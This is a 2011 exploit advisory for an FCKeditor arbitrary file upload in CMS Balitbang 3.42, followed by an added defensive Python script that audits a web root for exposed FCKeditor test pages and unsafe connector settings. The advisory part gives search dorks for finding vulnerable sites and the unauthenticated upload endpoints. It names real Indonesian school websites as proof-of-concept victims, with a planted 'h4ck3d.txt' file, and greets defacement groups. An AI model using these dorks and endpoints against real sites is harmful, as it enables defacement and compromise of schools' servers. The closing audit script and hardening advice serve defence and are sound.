Title Exploited : CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit
Author Exploit : the_cyber_nuxbie
Time & Date : 2011-04-26
============================================================================================================
| CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit |

#[~] Author : the_cyber_nuxbie
#[~] Home : www.thecybernuxbie.com
#[~] E-mail : nuxbie@sekuritionline.net
#[~] Found : 06 April 2011.
#[~] Version: CMS Balitbang 3.42.
#[~] Tested : Windows 7 Ultimate 32bit.
#[~] Link : http://www.kajianwebsite.org/download/cms-balitbang.rar

#[!] Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

______________________________________________________________

#[~] Exploited:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

#[~] Directory:
http://public_html/userfiles/file/file-deface.txt

Setting: "editor/filemanager/connectors/php/config.php"

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File'] = array() ;
$Config['FileTypesPath']['File'] = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

- P.o.C:
1. Target: Special Site: .sch.id (indonesian).
http://www.sma-magelang.sch.id
http://www.smp-banjar.sch.id
http://www.sma3-pesantren.sch.id
2. http://www.sma-magelang.sch.id/editor/filemanager/connectors/test.html
http://www.sma-magelang.sch.id/editor/filemanager/connectors/uploadtest.html
3. Find Your Files:
http://www.sma-magelang.sch.id/userfiles/file/h4ck3d.txt

- Greetz:
All Member YogyaFamilyCode.
All Member IndonesianDefacer.
All Member IndonesianCoder.
All Member MagelangCyber.
All Member Devilzc0de.
All Member Hacker-Newbie.
All Member Jatim-Crew.
All Member Fast-Hacker

- April 7 2011, GMT +07:00 Solo Raya, Indonesia.
============================================================================================================
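The weakness the advisory relies on is an FCKeditor file-manager connector left enabled and reachable without authentication, together with the sample pages (test.html, uploadtest.html, browser.html) that ship with the editor. The audit script below is an added example, not part of the advisory or of CMS Balitbang: it walks a document root laid out like the one above, flags those distribution pages, and reads connectors/php/config.php to report whether the PHP connector is switched on ($Config['Enabled'], a real FCKeditor setting that defaults to false) and whether the allowed-extension list contains anything the server or a browser would treat as active content. The extension list in the constructed sample config is the one quoted above; the Enabled line and the throwaway directory tree are assumptions built for the example.

```python
"""Audit a web root for an exposed FCKeditor file-manager connector.

Added example (not part of the original advisory).  Paths follow the layout
shown in the advisory; the sample tree and config are constructed here so
the script runs offline.
"""
import os
import re
import tempfile

# Sample and test pages that ship with the FCKeditor distribution; on a
# production site they should not be reachable at all.
TEST_PAGES = (
    "editor/filemanager/connectors/test.html",
    "editor/filemanager/connectors/uploadtest.html",
    "editor/filemanager/browser/default/browser.html",
)
CONFIG_PATH = "editor/filemanager/connectors/php/config.php"

ENABLED_RE = re.compile(r"\$Config\['Enabled'\]\s*=\s*(true|false)", re.I)
ALLOWED_RE = re.compile(
    r"\$Config\['AllowedExtensions'\]\['File'\]\s*=\s*array\((.*?)\)", re.S
)
# Extensions the web server may execute or a browser may run as active content.
ACTIVE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "shtml", "html", "htm", "svg", "js"}


def parse_config(text):
    """Return (connector_enabled, allowed_file_extensions) from config.php source."""
    m = ENABLED_RE.search(text)
    enabled = bool(m) and m.group(1).lower() == "true"
    m = ALLOWED_RE.search(text)
    allowed = re.findall(r"'([^']*)'", m.group(1)) if m else []
    return enabled, allowed


def audit(webroot):
    """Return a list of (severity, message) findings for one document root."""
    findings = []
    for rel in TEST_PAGES:
        if os.path.isfile(os.path.join(webroot, rel)):
            findings.append(("high", "distribution test page present: " + rel))
    cfg = os.path.join(webroot, CONFIG_PATH)
    if os.path.isfile(cfg):
        with open(cfg, encoding="utf-8", errors="replace") as fh:
            enabled, allowed = parse_config(fh.read())
        if enabled:
            findings.append(("high", "PHP connector enabled: unauthenticated upload endpoint"))
        active = sorted(ACTIVE_EXTENSIONS & {e.lower() for e in allowed})
        if active:
            findings.append(("high", "active-content extensions allowed: " + ",".join(active)))
        elif len(allowed) > 20:
            findings.append(("low", "broad allowed-extension list (%d types)" % len(allowed)))
    return findings


# Constructed sample config.php: the extension list is the one quoted in the
# advisory; the Enabled line is assumed, since uploads only succeed with it set.
SAMPLE_CONFIG = """<?php
$Config['Enabled'] = true ;
$Config['UserFilesPath'] = '/userfiles/' ;
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File'] = array() ;
"""

# Hardened counterpart (constructed): connector off; if it must stay on,
# keep the list to the document types the site actually needs.
HARDENED_CONFIG = """<?php
$Config['Enabled'] = false ;
$Config['AllowedExtensions']['File'] = array('pdf', 'doc', 'xls', 'zip') ;
$Config['DeniedExtensions']['File'] = array() ;
"""


def build_sample_webroot(config_text=SAMPLE_CONFIG, with_test_pages=True):
    """Create a throwaway document root mirroring the advisory's layout (constructed)."""
    root = tempfile.mkdtemp(prefix="fck-audit-")
    cfg = os.path.join(root, CONFIG_PATH)
    os.makedirs(os.path.dirname(cfg))
    with open(cfg, "w", encoding="utf-8") as fh:
        fh.write(config_text)
    if with_test_pages:
        for rel in TEST_PAGES[:2]:  # test.html and uploadtest.html, as in the P.o.C
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
    return root


if __name__ == "__main__":
    for sev, msg in audit(build_sample_webroot()):
        print(sev.upper(), msg)
```

Against the constructed sample the script reports the two exposed test pages, the enabled connector, and the 51-entry extension list; against the hardened config with the sample pages removed it reports nothing. Beyond config.php, the same check belongs on the web server: deny all requests under editor/filemanager/connectors/ unless they come from an authenticated editor session, and serve userfiles/ with script execution disabled.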